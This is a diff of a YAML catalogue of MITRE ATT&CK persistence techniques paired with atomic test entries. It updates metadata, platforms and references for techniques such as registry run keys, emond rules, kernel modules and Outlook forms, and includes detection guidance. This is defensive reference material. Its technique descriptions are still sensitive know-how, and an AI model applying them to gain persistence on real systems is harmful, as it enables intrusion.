         triggered by a file type association. When a file is opened, the default program
@@ -55177,7 +55608,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
-      x_mitre_attack_spec_version: 2.1.0
       x_mitre_contributors:
       - Travis Smith, Tripwire
       - Stefan Kanthak
@@ -55191,7 +55621,6 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -55218,8 +55647,8 @@ persistence:
         url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
       - source_name: Microsoft File Handlers
         description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
-          Retrieved November 13, 2014.
-        url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+          Retrieved September 12, 2024.
+        url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
       - source_name: Microsoft Assoc Oct 2017
         description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
           7, 2018.
@@ -55230,7 +55659,8 @@ persistence:
         url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.001
     atomic_tests:
     - name: Change Default File Association
@@ -55300,7 +55730,7 @@ persistence:
         The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path <code>/private/var/db/emondClients</code>, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at<code>/System/Library/LaunchDaemons/com.apple.emond.plist</code>.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
 
         Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T00:16:01.732Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Emond'
       x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -55320,12 +55750,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.014
     atomic_tests: []
   T1574.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:37.026Z'
       name: Services File Permissions Weakness
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -55379,11 +55808,10 @@ persistence:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1547.001:
     technique:
-      modified: '2023-10-16T09:08:22.319Z'
+      modified: '2024-09-12T15:27:58.051Z'
       name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
       description: |-
         Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -55470,9 +55898,9 @@ persistence:
           in the Registry. Retrieved August 3, 2020.
         url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
       - source_name: Microsoft Run Key
-        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa376977
+        description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
       - source_name: Oddvar Moe RunOnceEx Mar 2018
         description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
           from Autoruns.exe. Retrieved June 29, 2018.
@@ -55485,7 +55913,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.001
     atomic_tests:
     - name: Reg Key Run
@@ -55919,7 +56346,7 @@ persistence:
         elevation_required: true
   T1136.003:
     technique:
-      modified: '2024-03-28T16:14:28.678Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Create Account: Cloud Account'
       description: |-
         Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -55932,9 +56359,11 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Praetorian
       - Microsoft Threat Intelligence Center (MSTIC)
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Collect usage logs from cloud user and administrator accounts
         to identify unusual activity in the creation of new accounts and assignment
@@ -55943,13 +56372,13 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - IaaS
-      - Google Workspace
       - SaaS
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Creation'
       type: attack-pattern
@@ -55997,14 +56426,11 @@ persistence:
         url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1136.003
     atomic_tests: []
   T1098:
     technique:
-      modified: '2024-01-16T22:24:38.234Z'
+      modified: '2024-10-15T15:35:57.382Z'
       name: Account Manipulation
       description: "Adversaries may manipulate accounts to maintain and/or elevate
         access to victim systems. Account manipulation may consist of any action that
@@ -56040,16 +56466,15 @@ persistence:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - SaaS
       - Network
       - Containers
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
@@ -56090,7 +56515,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098
     atomic_tests:
     - name: Admin Account Manipulate
@@ -56585,138 +57009,137 @@ persistence:
           commands first\"\n}\n"
   T1547.006:
     technique:
-      x_mitre_platforms:
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
+      modified: '2024-09-12T17:30:54.170Z'
+      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+      description: |-
+        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
+
+        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
       x_mitre_contributors:
       - Wayne Silva, F-Secure Countercept
       - Anastasios Pingios
       - Jeremy Galloway
       - Red Canary
       - Eric Kaiser @ideologysec
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_deprecated: false
+      x_mitre_detection: |
+        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
+
+        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      - Linux
+      x_mitre_version: '1.3'
+      x_mitre_data_sources:
+      - 'Command: Command Execution'
+      - 'File: File Creation'
+      - 'File: File Modification'
+      - 'Kernel: Kernel Module Load'
+      - 'Process: Process Creation'
+      x_mitre_permissions_required:
+      - root
       type: attack-pattern
       id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
       created: '2020-01-24T17:42:23.339Z'
-      x_mitre_version: '1.3'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1547.006
         url: https://attack.mitre.org/techniques/T1547/006
+        external_id: T1547.006
       - source_name: Apple Developer Configuration Profile
-        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
         description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
           September 23, 2021.
+        url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
       - source_name: Apple Kernel Extension Deprecation
-        url: https://developer.apple.com/support/kernel-extensions/
         description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
           Alternatives. Retrieved November 4, 2020.
+        url: https://developer.apple.com/support/kernel-extensions/
       - source_name: System and kernel extensions in macOS
-        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
         description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
           March 31, 2022.
+        url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
       - source_name: GitHub Reptile
-        url: https://github.com/f0rb1dd3n/Reptile
         description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
           April 9, 2018.
+        url: https://github.com/f0rb1dd3n/Reptile
       - source_name: Volatility Phalanx2
-        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
         description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
           to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+        url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
       - source_name: iDefense Rootkit Overview
-        url: http://www.megasecurity.org/papers/Rootkits.pdf
         description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
-          April 6, 2018.
+          September 12, 2024.
+        url: https://www.megasecurity.org/papers/Rootkits.pdf
       - source_name: Linux Loadable Kernel Module Insert and Remove LKMs
-        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
         description: Henderson, B. (2006, September 24). How To Insert And Remove
           LKMs. Retrieved April 9, 2018.
+        url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
       - source_name: CrowdStrike Linux Rootkit
-        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
         description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
           Retrieved December 21, 2017.
+        url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
       - source_name: GitHub Diamorphine
-        url: https://github.com/m0nad/Diamorphine
         description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
           Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+        url: https://github.com/m0nad/Diamorphine
       - source_name: Securelist Ventir
-        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
         description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
           your MacOS spy. Retrieved April 6, 2018.'
+        url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
       - source_name: User Approved Kernel Extension Pike’s
-        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
         description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
           Loading…. Retrieved September 23, 2021.
+        url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
       - source_name: Linux Kernel Module Programming Guide
-        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
         description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
           Retrieved April 6, 2018.
+        url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
       - source_name: Linux Kernel Programming
-        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
         description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
           Module Programming Guide. Retrieved April 6, 2018.
+        url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
       - source_name: Trend Micro Skidmap
-        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
         description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
           Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
           Retrieved June 4, 2020.
+        url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
       - source_name: Purves Kextpocalypse 2
-        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
         description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
           . Retrieved September 23, 2021.
+        url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
       - source_name: RSAC 2015 San Francisco Patrick Wardle
-        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
         description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
           Retrieved April 6, 2018.
+        url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
       - source_name: Synack Secure Kernel Extension Broken
-        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
         description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
           Extension Loading’ is Broken. Retrieved April 6, 2018.
+        url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
       - source_name: Wikipedia Loadable Kernel Module
-        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
         description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
           April 9, 2018.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming) 
-
-        When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
-        Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
-        Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
-        Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
-      x_mitre_detection: |
-        Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: <code>modprobe</code>, <code>insmod</code>, <code>lsmod</code>, <code>rmmod</code>, or <code>modinfo</code> (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into <code>/lib/modules</code> and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
-        Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: <code>apt-get install linux-headers-$(uname -r)</code> On RHEL and CentOS based systems this can be accomplished by running: <code>yum install kernel-devel-$(uname -r)</code>
-
-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests:
     - name: Snake Malware Kernel Driver Comadmin
@@ -56779,7 +57202,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -56805,12 +57228,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -56888,9 +57309,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -56917,7 +57337,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -56939,41 +57359,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -56982,22 +57371,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
